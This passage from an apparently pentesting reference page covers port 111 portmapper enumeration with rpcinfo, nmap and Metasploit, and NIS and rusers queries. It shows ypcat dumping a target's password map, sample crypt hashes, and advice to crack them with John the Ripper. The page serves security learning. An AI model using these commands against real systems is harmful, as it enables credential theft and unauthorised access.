Physical attacks
Mobile Apps Pentesting
Pentesting

111/TCP/UDP - Pentesting Portmapper

Basic Information

Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service.

Default port: 111/TCP/UDP, 32771 in Oracle Solaris

PORT STATE SERVICE
111/tcp open rpcbind

Enumeration

rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1

RPCBind + NFS

Useful nmap scripts

nfs-ls #List NFS exports and check permissions
nfs-showmount #Like showmount -e
nfs-statfs #Disk statistics and info from NFS share

Useful metasploit modules

scanner/nfs/nfsmount #Scan NFS mounts and list permissions

NIS

Upon obtaining the NIS domain name for the environment (example.org in this case), use the ypwhich command to ping the NIS server and ypcat to obtain sensitive material, as demonstrated in Example 7-39. You should feed encrypted password hashes into John the Ripper, and once cracked, you can use it to evaluate system access and privileges.

root@kali:~# apt-get install nis
root@kali:~# ypwhich -d example.org 192.168.10.1
potatohead.example.org
root@kali:~# ypcat –d example.org –h 192.168.10.1 passwd.byname
tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash
katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash
james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh
florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh
dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash
yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash

Master file

Map(s)

Notes

/etc/hosts

hosts.byname, hosts.byaddr

Contains hostnames and IP details

/etc/passwd

passwd.byname, passwd.byuid

NIS user password file

/etc/group

group.byname, group.bygid

NIS group file

/usr/lib/aliases

mail.aliases

Details mail aliases

RPC Users

RPC rusersd endpoint that reveals active user sessions.

root@kali:~# apt-get install rusers
root@kali:~# rusers -l 192.168.10.1
Sending broadcast for rusersd protocol version 3...
Sending broadcast for rusersd protocol version 2...
tiff potatohead:console Sep 2 13:03 22:03
katykat potatohead:ttyp5 Sep 1 09:35 14